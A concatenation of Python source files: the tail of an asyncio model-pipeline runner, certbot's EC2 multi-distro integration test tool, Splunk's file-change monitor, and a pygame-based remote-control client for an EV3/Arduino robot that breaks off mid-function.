tasks = tasks + self.createTasks(model=model,executors=int(model.getThreadCount()),params=params,loop=loop)
else:
resultQ = queue.Queue()
params = baseParams + [model.getQIn(),resultQ]
tasks = tasks + self.createTasks(model=model, executors=int(model.getThreadCount()), params=params,loop=loop)
t = threading.Thread(target=self.startThread,args=(tasks,loop,))
t.start()
self.logger.info('Created Model - %s.', str(modelName))
self.logger.info('All models created. Launching event loop.')
def qGet(self,q):
return q.get()
def qPut(self,q,task_result):
q.put(task_result)
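# A minimal sketch of the pattern used by producer/consumer below: blocking
# queue.Queue operations are bridged into asyncio by running them on a
# ThreadPoolExecutor, so a coroutine can await a thread-safe queue without
# blocking the event loop:
#     item = await loop.run_in_executor(executor, self.qGet, q)
#     await loop.run_in_executor(executor, self.qPut, q, item)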
async def producer(self,model,qOut,qErr,qOnSuccess,qOnFailure,qIn,resultQ,loop=None):
with ThreadPoolExecutor(max_workers=10) as executor:
modelType = model.getModelType()
while True:
try:
taskInput = {}
for q in qIn:
task_result = await loop.run_in_executor(executor, self.qGet, q)
taskInput.update(task_result)
await model.getCallable()(resultQ,loop,**taskInput)
if modelType == 'generator':
break
except Exception:
self.logger.error('%s in Model - %s, Program - %s.%s.%s',str(sys.exc_info()),str(model.getModelName()), model.getModuleName(),model.getClassName(),model.getMethodName())
async def consumer(self,model,qOut,qErr,qOnSuccess,qOnFailure,qIn,resultQ,loop=None):
with ThreadPoolExecutor(max_workers=10) as executor:
modelType = model.getModelType()
while True:
try:
if modelType == 'sink':
break
task_result = await loop.run_in_executor(executor, self.qGet, resultQ)
if modelType == 'connection':
if task_result.get('onFailure'):
del [task_result['onFailure']]
for q in qOnFailure:
await loop.run_in_executor(executor, self.qPut, q, task_result)
else:
for q in qOnSuccess:
await loop.run_in_executor(executor, self.qPut, q, task_result)
else:
for q in qOut:
await loop.run_in_executor(executor, self.qPut, q, task_result)
except Exception:
self.logger.error('%s in Model - %s, Program - %s.%s.%s',str(sys.exc_info()),str(model.getModelName()), model.getModuleName(),model.getClassName(),model.getMethodName())
def createModels(self,*args,**kwargs):
for modelName in self._modelNames:
self._ModelCreate.create(modelName=modelName,model_init_event=self._modelInit,*args,**kwargs)
def createConnections(self,*args,**kwargs):
for _connection in self._ModelManager.getModelConnections():
self._ModelCreate.create(modelName='connection',connectionObject=_connection,model_init_event=self._modelInit,*args,**kwargs)
|
multitester.py
|
"""
Certbot Integration Test Tool
- Configures (canned) boulder server
- Launches EC2 instances with a given list of AMIs for different distros
- Copies certbot repo and puts it on the instances
- Runs certbot tests (bash scripts) on all of these
- Logs execution and success/fail for debugging
Notes:
- Some AWS images, e.g. official CentOS and FreeBSD images
require acceptance of user terms on the AWS marketplace
website. This can't be automated.
- AWS EC2 has a default limit of 20 t2/t1 instances, if more
are needed, they need to be requested via online webform.
Usage:
- Requires AWS IAM secrets to be set up with aws cli
- Requires an AWS associated keyfile <keyname>.pem
>aws configure --profile HappyHacker
[interactive: enter secrets for IAM role]
>aws ec2 create-key-pair --profile HappyHacker --key-name MyKeyPair \
--query 'KeyMaterial' --output text > MyKeyPair.pem
then:
>python multitester.py targets.yaml MyKeyPair.pem HappyHacker scripts/test_leauto_upgrades.sh
see:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-ec2-keypairs.html
"""
from __future__ import print_function
from __future__ import with_statement
import argparse
import multiprocessing as mp
from multiprocessing import Manager
import os
import socket
import sys
import time
import traceback
import boto3
from botocore.exceptions import ClientError
from six.moves.urllib import error as urllib_error
from six.moves.urllib import request as urllib_request
import yaml
from fabric import Config
from fabric import Connection
# Command line parser
#-------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Builds EC2 cluster for testing.')
parser.add_argument('config_file',
help='yaml configuration file for AWS server cluster')
parser.add_argument('key_file',
help='key file (<keyname>.pem) for AWS')
parser.add_argument('aws_profile',
help='profile for AWS (i.e. as in ~/.aws/certificates)')
parser.add_argument('test_script',
default='test_letsencrypt_auto_certonly_standalone.sh',
help='path of bash script in to deploy and run')
parser.add_argument('--repo',
default='https://github.com/letsencrypt/letsencrypt.git',
help='certbot git repo to use')
parser.add_argument('--branch',
default='~',
help='certbot git branch to trial')
parser.add_argument('--pull_request',
default='~',
help='letsencrypt/letsencrypt pull request to trial')
parser.add_argument('--merge_master',
action='store_true',
help="if set merges PR into master branch of letsencrypt/letsencrypt")
parser.add_argument('--saveinstances',
action='store_true',
help="don't kill EC2 instances after run, useful for debugging")
parser.add_argument('--alt_pip',
default='',
help="server from which to pull candidate release packages")
parser.add_argument('--killboulder',
action='store_true',
help="do not leave a persistent boulder server running")
parser.add_argument('--boulderonly',
action='store_true',
help="only make a boulder server")
cl_args = parser.parse_args()
# Credential Variables
#-------------------------------------------------------------------------------
# assumes naming: <key_filename> = <keyname>.pem
KEYFILE = cl_args.key_file
KEYNAME = os.path.split(cl_args.key_file)[1].split('.pem')[0]
PROFILE = None if cl_args.aws_profile == 'SET_BY_ENV' else cl_args.aws_profile
# Globals
#-------------------------------------------------------------------------------
BOULDER_AMI = 'ami-072a9534772bec854' # premade shared boulder AMI 18.04LTS us-east-1
SECURITY_GROUP_NAME = 'certbot-security-group'
SENTINEL = None #queue kill signal
SUBNET_NAME = 'certbot-subnet'
class Status(object):
"""Possible statuses of client tests."""
PASS = 'pass'
FAIL = 'fail'
# Boto3/AWS automation functions
#-------------------------------------------------------------------------------
def should_use_subnet(subnet):
"""Should we use the given subnet for these tests?
We should if it is the default subnet for the availability zone or the
subnet is named "certbot-subnet".
"""
if not subnet.map_public_ip_on_launch:
return False
if subnet.default_for_az:
return True
for tag in subnet.tags:
if tag['Key'] == 'Name' and tag['Value'] == SUBNET_NAME:
return True
return False
def make_security_group(vpc):
"""Creates a security group in the given VPC."""
# will fail if security group of GroupName already exists
# cannot have duplicate SGs of the same name
mysg = vpc.create_security_group(GroupName=SECURITY_GROUP_NAME,
Description='security group for automated testing')
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=22, ToPort=22)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=80, ToPort=80)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=443, ToPort=443)
# for boulder wfe (http) server
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=4000, ToPort=4000)
# for mosh
mysg.authorize_ingress(IpProtocol="udp", CidrIp="0.0.0.0/0", FromPort=60000, ToPort=61000)
return mysg
def make_instance(ec2_client,
instance_name,
ami_id,
keyname,
security_group_id,
subnet_id,
machine_type='t2.micro',
userdata=""): #userdata contains bash or cloud-init script
block_device_mappings = _get_block_device_mappings(ec2_client, ami_id)
tags = [{'Key': 'Name', 'Value': instance_name}]
tag_spec = [{'ResourceType': 'instance', 'Tags': tags}]
return ec2_client.create_instances(
BlockDeviceMappings=block_device_mappings,
ImageId=ami_id,
SecurityGroupIds=[security_group_id],
SubnetId=subnet_id,
KeyName=keyname,
MinCount=1,
MaxCount=1,
UserData=userdata,
InstanceType=machine_type,
TagSpecifications=tag_spec)[0]
def _get_block_device_mappings(ec2_client, ami_id):
"""Returns the list of block device mappings to ensure cleanup.
This list sets connected EBS volumes to be deleted when the EC2
instance is terminated.
"""
# Not all devices use EBS, but the default value for DeleteOnTermination
# when the device does use EBS is true. See:
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-mapping.html
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-template.html
return [{'DeviceName': mapping['DeviceName'],
'Ebs': {'DeleteOnTermination': True}}
for mapping in ec2_client.Image(ami_id).block_device_mappings
if not mapping.get('Ebs', {}).get('DeleteOnTermination', True)]
# Helper Routines
#-------------------------------------------------------------------------------
def block_until_http_ready(urlstring, wait_time=10, timeout=240):
"Blocks until server at urlstring can respond to http requests"
server_ready = False
t_elapsed = 0
while not server_ready and t_elapsed < timeout:
try:
sys.stdout.write('.')
sys.stdout.flush()
req = urllib_request.Request(urlstring)
response = urllib_request.urlopen(req)
#if response.code == 200:
server_ready = True
except urllib_error.URLError:
pass
time.sleep(wait_time)
t_elapsed += wait_time
def block_until_ssh_open(ipstring, wait_time=10, timeout=120):
"Blocks until server at ipstring has an open port 22"
reached = False
t_elapsed = 0
while not reached and t_elapsed < timeout:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ipstring, 22))
reached = True
except socket.error:
time.sleep(wait_time)
t_elapsed += wait_time
sock.close()
def block_until_instance_ready(booting_instance, wait_time=5, extra_wait_time=20):
"Blocks booting_instance until AWS EC2 instance is ready to accept SSH connections"
state = booting_instance.state['Name']
ip = booting_instance.public_ip_address
while state != 'running' or ip is None:
time.sleep(wait_time)
# The instance needs to be reloaded to update its local attributes. See
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Instance.reload.
booting_instance.reload()
state = booting_instance.state['Name']
ip = booting_instance.public_ip_address
block_until_ssh_open(ip)
time.sleep(extra_wait_time)
return booting_instance
# Fabric Routines
#-------------------------------------------------------------------------------
def local_git_clone(local_cxn, repo_url, log_dir):
"""clones master of repo_url"""
local_cxn.local('cd %s && if [ -d letsencrypt ]; then rm -rf letsencrypt; fi' % log_dir)
local_cxn.local('cd %s && git clone %s letsencrypt'% (log_dir, repo_url))
local_cxn.local('cd %s && tar czf le.tar.gz letsencrypt'% log_dir)
def local_git_branch(local_cxn, repo_url, branch_name, log_dir):
"""clones branch <branch_name> of repo_url"""
local_cxn.local('cd %s && if [ -d letsencrypt ]; then rm -rf letsencrypt; fi' % log_dir)
local_cxn.local('cd %s && git clone %s letsencrypt --branch %s --single-branch'%
(log_dir, repo_url, branch_name))
local_cxn.local('cd %s && tar czf le.tar.gz letsencrypt' % log_dir)
def local_git_PR(local_cxn, repo_url, PRnumstr, log_dir, merge_master=True):
"""clones specified pull request from repo_url and optionally merges into master"""
local_cxn.local('cd %s && if [ -d letsencrypt ]; then rm -rf letsencrypt; fi' % log_dir)
local_cxn.local('cd %s && git clone %s letsencrypt' % (log_dir, repo_url))
local_cxn.local('cd %s && cd letsencrypt && '
'git fetch origin pull/%s/head:lePRtest' % (log_dir, PRnumstr))
local_cxn.local('cd %s && cd letsencrypt && git checkout lePRtest' % log_dir)
if merge_master:
local_cxn.local('cd %s && cd letsencrypt && git remote update origin' % log_dir)
local_cxn.local('cd %s && cd letsencrypt && '
'git merge origin/master -m "testmerge"' % log_dir)
local_cxn.local('cd %s && tar czf le.tar.gz letsencrypt' % log_dir)
def local_repo_to_remote(cxn, log_dir):
"""copies local tarball of repo to remote"""
filename = 'le.tar.gz'
local_path = os.path.join(log_dir, filename)
cxn.put(local=local_path, remote='')
cxn.run('tar xzf %s' % filename)
def local_repo_clean(local_cxn, log_dir):
"""delete tarball"""
filename = 'le.tar.gz'
local_path = os.path.join(log_dir, filename)
local_cxn.local('rm %s' % local_path)
def deploy_script(cxn, scriptpath, *args):
"""copies to remote and executes local script"""
cxn.put(local=scriptpath, remote='', preserve_mode=True)
scriptfile = os.path.split(scriptpath)[1]
args_str = ' '.join(args)
cxn.run('./'+scriptfile+' '+args_str)
def run_boulder(cxn):
boulder_path = '$GOPATH/src/github.com/letsencrypt/boulder'
cxn.run('cd %s && sudo docker-compose up -d' % boulder_path)
def config_and_launch_boulder(cxn, instance):
# yes, we're hardcoding the gopath. it's a predetermined AMI.
with cxn.prefix('export GOPATH=/home/ubuntu/gopath'):
deploy_script(cxn, 'scripts/boulder_config.sh')
run_boulder(cxn)
def install_and_launch_certbot(cxn, instance, boulder_url, target, log_dir):
local_repo_to_remote(cxn, log_dir)
# This needs to be like this, I promise. 1) The env argument to run doesn't work.
# See https://github.com/fabric/fabric/issues/1744. 2) prefix() sticks an && between
# the commands, so it needs to be exports rather than no &&s in between for the script subshell.
with cxn.prefix('export BOULDER_URL=%s && export PUBLIC_IP=%s && export PRIVATE_IP=%s && '
'export PUBLIC_HOSTNAME=%s && export PIP_EXTRA_INDEX_URL=%s && '
'export OS_TYPE=%s' %
(boulder_url,
instance.public_ip_address,
instance.private_ip_address,
instance.public_dns_name,
cl_args.alt_pip,
target['type'])):
deploy_script(cxn, cl_args.test_script)
def grab_certbot_log(cxn):
"grabs letsencrypt.log via cat into logged stdout"
cxn.sudo('/bin/bash -l -i -c \'if [ -f "/var/log/letsencrypt/letsencrypt.log" ]; then ' +
'cat "/var/log/letsencrypt/letsencrypt.log"; else echo "[novarlog]"; fi\'')
# fallback file if /var/log is unwriteable...? correct?
cxn.sudo('/bin/bash -l -i -c \'if [ -f ./certbot.log ]; then ' +
'cat ./certbot.log; else echo "[nolocallog]"; fi\'')
def create_client_instance(ec2_client, target, security_group_id, subnet_id):
"""Create a single client instance for running tests."""
if 'machine_type' in target:
machine_type = target['machine_type']
elif target['virt'] == 'hvm':
machine_type = 't2.medium'
else:
# 32 bit systems
machine_type = 'c1.medium'
if 'userdata' in target:
userdata = target['userdata']
else:
userdata = ''
name = 'le-%s'%target['name']
print(name, end=" ")
return make_instance(ec2_client,
name,
target['ami'],
KEYNAME,
machine_type=machine_type,
security_group_id=security_group_id,
subnet_id=subnet_id,
userdata=userdata)
def test_client_process(fab_config, inqueue, outqueue, boulder_url, log_dir):
cur_proc = mp.current_process()
for inreq in iter(inqueue.get, SENTINEL):
ii, instance_id, target = inreq
# Each client process is given its own session due to the suggestion at
# https://boto3.amazonaws.com/v1/documentation/api/latest/guide/resources.html?highlight=multithreading#multithreading-multiprocessing.
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
instance = ec2_client.Instance(id=instance_id)
#save all stdout to log file
sys.stdout = open(log_dir+'/'+'%d_%s.log'%(ii,target['name']), 'w')
print("[%s : client %d %s %s]" % (cur_proc.name, ii, target['ami'], target['name']))
instance = block_until_instance_ready(instance)
print("server %s at %s"%(instance, instance.public_ip_address))
host_string = "%s@%s"%(target['user'], instance.public_ip_address)
print(host_string)
with Connection(host_string, config=fab_config) as cxn:
try:
install_and_launch_certbot(cxn, instance, boulder_url, target, log_dir)
outqueue.put((ii, target, Status.PASS))
print("%s - %s SUCCESS"%(target['ami'], target['name']))
except:
outqueue.put((ii, target, Status.FAIL))
print("%s - %s FAIL"%(target['ami'], target['name']))
traceback.print_exc(file=sys.stdout)
pass
# append server certbot.log to each per-machine output log
print("\n\ncertbot.log\n" + "-"*80 + "\n")
try:
grab_certbot_log(cxn)
except:
print("log fail\n")
traceback.print_exc(file=sys.stdout)
pass
def cleanup(cl_args, instances, targetlist, boulder_server, log_dir):
print('Logs in ', log_dir)
# If lengths of instances and targetlist aren't equal, instances failed to
# start before running tests so leaving instances running for debugging
# isn't very useful. Let's cleanup after ourselves instead.
if len(instances) != len(targetlist) or not cl_args.saveinstances:
print('Terminating EC2 Instances')
if cl_args.killboulder:
boulder_server.terminate()
for instance in instances:
instance.terminate()
else:
# print login information for the boxes for debugging
for ii, target in enumerate(targetlist):
print(target['name'],
target['ami'],
"%s@%s"%(target['user'], instances[ii].public_ip_address))
def main():
# Fabric library controlled through global env parameters
fab_config = Config(overrides={
"connect_kwargs": {
"key_filename": [KEYFILE], # https://github.com/fabric/fabric/issues/2007
},
"run": {
"echo": True,
"pty": True,
},
"timeouts": {
"connect": 10,
},
})
# no network connection, so don't worry about closing this one.
local_cxn = Connection('localhost', config=fab_config)
# Set up local copy of git repo
#-------------------------------------------------------------------------------
log_dir = "letest-%d"%int(time.time()) #points to logging / working directory
print("Making local dir for test repo and logs: %s"%log_dir)
local_cxn.local('mkdir %s'%log_dir)
try:
# figure out what git object to test and locally create it in log_dir
print("Making local git repo")
if cl_args.pull_request != '~':
print('Testing PR %s ' % cl_args.pull_request,
"MERGING into master" if cl_args.merge_master else "")
local_git_PR(local_cxn, cl_args.repo, cl_args.pull_request, log_dir,
cl_args.merge_master)
elif cl_args.branch != '~':
print('Testing branch %s of %s' % (cl_args.branch, cl_args.repo))
local_git_branch(local_cxn, cl_args.repo, cl_args.branch, log_dir)
else:
print('Testing current branch of %s' % cl_args.repo, log_dir)
local_git_clone(local_cxn, cl_args.repo, log_dir)
except BaseException:
print("FAIL: trouble with git repo")
traceback.print_exc()
exit(1)
# Set up EC2 instances
#-------------------------------------------------------------------------------
configdata = yaml.safe_load(open(cl_args.config_file, 'r'))
targetlist = configdata['targets']
print('Testing against these images: [%d total]'%len(targetlist))
for target in targetlist:
print(target['ami'], target['name'])
print("Connecting to EC2 using\n profile %s\n keyname %s\n keyfile %s"%(PROFILE, KEYNAME, KEYFILE))
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
print("Determining Subnet")
for subnet in ec2_client.subnets.all():
if should_use_subnet(subnet):
subnet_id = subnet.id
vpc_id = subnet.vpc.id
break
else:
print("No usable subnet exists!")
print("Please create a VPC with a subnet named {0}".format(SUBNET_NAME))
print("that maps public IPv4 addresses to instances launched in the subnet.")
sys.exit(1)
print("Making Security Group")
vpc = ec2_client.Vpc(vpc_id)
sg_exists = False
for sg in vpc.security_groups.all():
if sg.group_name == SECURITY_GROUP_NAME:
security_group_id = sg.id
sg_exists = True
print(" %s already exists"%SECURITY_GROUP_NAME)
if not sg_exists:
security_group_id = make_security_group(vpc).id
time.sleep(30)
boulder_preexists = False
boulder_servers = ec2_client.instances.filter(Filters=[
{'Name': 'tag:Name', 'Values': ['le-boulderserver']},
{'Name': 'instance-state-name', 'Values': ['running']}])
boulder_server = next(iter(boulder_servers), None)
print("Requesting Instances...")
if boulder_server:
print("Found existing boulder server:", boulder_server)
boulder_preexists = True
else:
print("Can't find a boulder server, starting one...")
boulder_server = make_instance(ec2_client,
'le-boulderserver',
BOULDER_AMI,
KEYNAME,
machine_type='t2.micro',
#machine_type='t2.medium',
security_group_id=security_group_id,
subnet_id=subnet_id)
instances = []
try:
if not cl_args.boulderonly:
print("Creating instances: ", end="")
for target in targetlist:
instances.append(
create_client_instance(ec2_client, target,
security_group_id, subnet_id)
)
print()
# Configure and launch boulder server
#-------------------------------------------------------------------------------
print("Waiting on Boulder Server")
boulder_server = block_until_instance_ready(boulder_server)
print(" server %s"%boulder_server)
# host_string defines the ssh user and host for connection
host_string = "ubuntu@%s"%boulder_server.public_ip_address
print("Boulder Server at (SSH):", host_string)
if not boulder_preexists:
print("Configuring and Launching Boulder")
with Connection(host_string, config=fab_config) as boulder_cxn:
config_and_launch_boulder(boulder_cxn, boulder_server)
# blocking often unnecessary, but cheap EC2 VMs can get very slow
block_until_http_ready('http://%s:4000'%boulder_server.public_ip_address,
wait_time=10, timeout=500)
boulder_url = "http://%s:4000/directory"%boulder_server.private_ip_address
print("Boulder Server at (public ip): http://%s:4000/directory"%boulder_server.public_ip_address)
print("Boulder Server at (EC2 private ip): %s"%boulder_url)
if cl_args.boulderonly:
sys.exit(0)
# Install and launch client scripts in parallel
#-------------------------------------------------------------------------------
print("Uploading and running test script in parallel: %s"%cl_args.test_script)
print("Output routed to log files in %s"%log_dir)
# (Advice: always use Manager.Queue, never regular multiprocessing.Queue
# the latter has implementation flaws that deadlock it in some circumstances)
manager = Manager()
outqueue = manager.Queue()
inqueue = manager.Queue()
# launch as many processes as clients to test
num_processes = len(targetlist)
jobs = [] #keep a reference to current procs
# initiate process execution
client_process_args=(fab_config, inqueue, outqueue, boulder_url, log_dir)
for i in range(num_processes):
p = mp.Process(target=test_client_process, args=client_process_args)
jobs.append(p)
p.daemon = True # kills subprocesses if parent is killed
p.start()
# fill up work queue
for ii, target in enumerate(targetlist):
inqueue.put((ii, instances[ii].id, target))
# add SENTINELs to end client processes
for i in range(num_processes):
inqueue.put(SENTINEL)
print('Waiting on client processes', end='')
for p in jobs:
while p.is_alive():
p.join(5 * 60)
# Regularly print output to keep Travis happy
print('.', end='')
sys.stdout.flush()
print()
# add SENTINEL to output queue
outqueue.put(SENTINEL)
# clean up
local_repo_clean(local_cxn, log_dir)
# print and save summary results
results_file = open(log_dir+'/results', 'w')
outputs = [outq for outq in iter(outqueue.get, SENTINEL)]
outputs.sort(key=lambda x: x[0])
failed = False
for outq in outputs:
ii, target, status = outq
if status == Status.FAIL:
failed = True
print('%d %s %s'%(ii, target['name'], status))
results_file.write('%d %s %s\n'%(ii, target['name'], status))
if len(outputs) != num_processes:
failed = True
failure_message = 'FAILURE: Some target machines failed to run and were not tested. ' +\
'Tests should be rerun.'
print(failure_message)
results_file.write(failure_message + '\n')
results_file.close()
if failed:
sys.exit(1)
finally:
cleanup(cl_args, instances, targetlist, boulder_server, log_dir)
if __name__ == '__main__':
main()
|
file_monitor.py
|
#
# Copyright 2021 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This module contains file monitoring class that can be used to check files
change periodically and call callback function to handle properly when
detecting files change.
"""
import logging
import os.path as op
import threading
import time
import traceback
__all__ = ["FileChangesChecker", "FileMonitor"]
class FileChangesChecker:
"""Files change checker.
:param callback: Callback function invoked on file changes.
:param files: Files to be monitored, with full path.
:type files: ``list, tuple``
"""
def __init__(self, callback, files):
self._callback = callback
self._files = files
self.file_mtimes = {file_name: None for file_name in self._files}
for k in self.file_mtimes:
try:
self.file_mtimes[k] = op.getmtime(k)
except OSError:
logging.debug("Getmtime for %s, failed: %s", k, traceback.format_exc())
def check_changes(self):
"""Check files change.
If some files are changed and callback function is not None, call
callback function to handle files change.
:returns: True if files changed else False
:rtype: ``bool``
"""
logging.debug("Checking files=%s", self._files)
file_mtimes = self.file_mtimes
changed_files = []
for f, last_mtime in list(file_mtimes.items()):
try:
current_mtime = op.getmtime(f)
if current_mtime != last_mtime:
file_mtimes[f] = current_mtime
changed_files.append(f)
logging.info("Detect %s has changed", f)
except OSError:
pass
if changed_files:
if self._callback:
self._callback(changed_files)
return True
return False
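# A minimal sketch (assumed usage): poll a single file once. The path and
# callback are hypothetical; check_changes() returns True when any mtime
# differs from the previous poll.
def _example_check_changes():
    def on_change(changed_files):
        logging.info("files changed: %s", changed_files)

    checker = FileChangesChecker(on_change, ["/tmp/example.conf"])
    return checker.check_changes()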
class FileMonitor:
"""Files change monitor.
Monitor files change in a separated thread and call callback
when there is files change.
:param callback: Callback for handling files change.
:param files: Files to monitor.
:type files: ``list, tuple``
:param interval: Interval (in seconds) between change checks.
Usage::
>>> import splunksolutionlib.file_monitor as fm
>>> fm = fm.FileMonitor(fm_callback, files_list, 5)
>>> fm.start()
"""
def __init__(self, callback, files, interval=1):
self._checker = FileChangesChecker(callback, files)
self._thr = threading.Thread(target=self._do_monitor)
self._thr.daemon = True
self._interval = interval
self._started = False
def start(self):
"""Start file monitor.
Start a background thread to monitor files change.
"""
if self._started:
return
self._started = True
self._thr.start()
def stop(self):
"""Stop file monitor.
Stop the background thread to monitor files change.
"""
self._started = False
def _do_monitor(self):
while self._started:
self._checker.check_changes()
for _ in range(self._interval):
if not self._started:
break
time.sleep(1)
|
ev3client.py
|
#!/usr/bin/python3.4
# @file ev3client.py
# @author Pavel Cherezov (cherezov.pavel@gmail.com)
import io
import os
import sys
import time
import pygame
import socket
import threading
import queue
import select
from urllib.request import urlopen
__version__ = '0.5'
import configparser
config = configparser.ConfigParser()
config.read('ev3client.cfg')
ARDUINO_CMD = 'arduino'
EV3_CMD = 'ev3'
mr3020Cfg = config['mr3020-board']
GATE_IP = mr3020Cfg['ip']
GATE_PORT = int(mr3020Cfg['arduino-port'])
EV3_PORT = int(mr3020Cfg['ev3-port'])
frameCfg = config['camera-frame']
CAMERA_URL_FORMAT = frameCfg['camera-url']
FRAME_PORT = int(frameCfg['port'])
FRAME_SIZE = (int(frameCfg['width']), int(frameCfg['height'])) # must be synced with web camera settings
FRAME_POS = (int(frameCfg['pos-x']), int(frameCfg['pos-y']))
windowCfg = config['window']
SCREEN_SIZE = (int(windowCfg['width']), int(windowCfg['height']))
IMG_FOLDER = windowCfg['img-path']
TXT_X = FRAME_POS[0] + FRAME_SIZE[0] + 50
settingsCfg = config['settings']
LOW_POWER = float(settingsCfg['battery-warn'])
ALIVE_SEC = float(settingsCfg['ping-warn'])
MIN_DISTANCE = float(settingsCfg['distance-warn'])
RED = pygame.Color(settingsCfg['warn-color'])
GREEN = pygame.Color('green')
BLACK = pygame.Color('black')
LIGHT_GREEN = pygame.Color(95, 190, 190)
def log(msg):
if not msg.strip():
return
with open('log.txt', 'a') as f:
f.write(msg)
f.write('\n')
class WebFrame:
def __init__(self, ip, port):
self.ip = ip
self.port = port
# Show noise in case of errors
frame = pygame.image.load(os.path.join(IMG_FOLDER, 'noise.jpg'))
self.__noiseFrame = pygame.transform.scale(frame, FRAME_SIZE)
frame = pygame.image.load(os.path.join(IMG_FOLDER, 'noise_black.jpg'))
self.__noiseBlackFrame = pygame.transform.scale(frame, FRAME_SIZE)
self.__frame = self.__noiseFrame
self.started = True
self.__thread = threading.Thread(target=self.frameLoop)
self.__thread.daemon = True
self.__thread.start()
def __getFrame(self):
try:
frame_url = CAMERA_URL_FORMAT.format(self.ip, self.port)
image_str = urlopen(frame_url).read()
image_file = io.BytesIO(image_str)
frame = pygame.image.load(image_file)
return frame
except:
pass
# Show noise in case of errors
return self.__noiseFrame if int(time.time()) % 2 == 0 else self.__noiseBlackFrame
def frameLoop(self):
while self.started:
self.__frame = self.__getFrame()
time.sleep(0.5)
def getFrame(self):
return self.__frame
def stop(self):
self.started = False
#self.__thread.join()
class Cmd:
KeyValDelimiter = ':'
def __init__(self, cmd, value, dest = None):
self.cmd = cmd
self.value = value
self.dest = dest
@staticmethod
def parse(raw):
if Cmd.KeyValDelimiter not in raw:
return Cmd(None, None, None)
return Cmd(*raw.split(Cmd.KeyValDelimiter)[:2])
def __repr__(self):
return '{}{}{};'.format(self.cmd, Cmd.KeyValDelimiter, self.value)
def __eq__(self, c):
return (self.cmd == c.cmd) and (self.value == c.value)
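# A minimal sketch of the wire format handled by Cmd: a command serializes to
# 'cmd:value;' (the trailing ';' presumably separates messages on the socket)
# and parses back from a 'cmd:value' string.
def _example_cmd_roundtrip():
    cmd = Cmd('xy', '0;-2.5', EV3_CMD)
    assert str(cmd) == 'xy:0;-2.5;'
    parsed = Cmd.parse('ping:ping')
    assert (parsed.cmd, parsed.value) == ('ping', 'ping')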
class CmdTransport:
def __init__(self, ip, port, ev3port):
self.ip = ip
self.port = port
self.ev3port = ev3port
self.__queue = queue.Queue()
self.in_queue = queue.Queue()
self.__socket = None
#self.__prevCmd = None
self.__lastReconnect = None
self.started = True
self.__thread = threading.Thread(target=self.__processLoop)
self.__thread.daemon = True
self.__thread.start()
self.__pingThread = threading.Thread(target=self.__pingThread)
self.__pingThread.daemon = True
self.__pingThread.start()
def __pingThread(self):
while self.started:
ping = Cmd('ping', 'ping', EV3_CMD)
self.send(ping)
time.sleep(ALIVE_SEC - 1)
def isReady(self):
return self.__socket is not None
def send(self, cmd):
#if cmd == self.__prevCmd:
# return
self.__queue.put_nowait(cmd)
#self.__prevCmd = cmd
def reconnectEv3(self):
if self.__lastReconnect is None or time.time() - self.__lastReconnect > 10:
print('reconnection..')
self.__ev3socket = self.__connect(self.ev3port)
def __processLoop(self):
self.__socket = self.__connect(self.port)
self.__ev3socket = self.__connect(self.ev3port)
if self.__socket is None:
return
while self.started:
try:
cmd = self.__queue.get_nowait()
cmds = str(cmd)
if cmd.dest is None or cmd.dest == ARDUINO_CMD:
r, w, x = select.select([self.__socket], [self.__socket], [], 1)
if self.__socket in r:
data = self.__socket.recv(128).decode()
self.in_queue.put(data)
if self.__socket in w:
                        print('sending to arduino:', cmds)
self.__socket.sendall(cmds.encode())
time.sleep(0.1)
if cmd.dest is None or cmd.dest == EV3_CMD:
r, w, x = select.select([self.__ev3socket], [self.__ev3socket], [self.__ev3socket], 1)
if self.__ev3socket in r:
data = self.__ev3socket.recv(128).decode()
self.in_queue.put(data)
if self.__ev3socket in w:
                        print('sending to ev3:', cmds)
self.__ev3socket.sendall(cmds.encode())
time.sleep(0.1)
except queue.Empty:
pass
except Exception as e:
print(e)
def __connect(self, port):
try:
self.__lastReconnect = time.time()
            print('Connecting to {}:{}'.format(self.ip, port))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
s.connect((self.ip, port))
return s
except Exception as e:
print(e)
return None
def stop(self):
self.started = False
#self.__thread.join()
class Joystick:
def __init__(self):
self.__joystick = None
self.__prev_x = 0
self.__prev_y = 0
        self.__initJoystick()
    def __initJoystick(self):
pygame.joystick.init()
if pygame.joystick.get_count() == 0:
return
joystickId = 0
self.__joystick = pygame.joystick.Joystick(joystickId)
self.__joystick.init()
def isReady(self):
return self.__joystick is not None
def read(self):
data = []
if self.__joystick is None:
return data
axes = self.__joystick.get_numaxes()
x = self.__joystick.get_axis(0)
y = self.__joystick.get_axis(1)
x = int(x * 100) / 10
y = int(y * 100) / 10
if abs(x) < 2:
x = 0
if abs(y) < 2:
y = 0
if self.__prev_x != x or self.__prev_y != y:
data.append(Cmd('xy', '{};{}'.format(x, y)))
self.__prev_x = x
self.__prev_y = y
buttons = self.__joystick.get_numbuttons()
for i in range( buttons ):
if i == 0:
button = self.__joystick.get_button( i )
if button == 1:
with open('say') as f:
l = f.readline()
data.append(Cmd('speak', l))
if i == 1:
button = self.__joystick.get_button( i )
if button == 1:
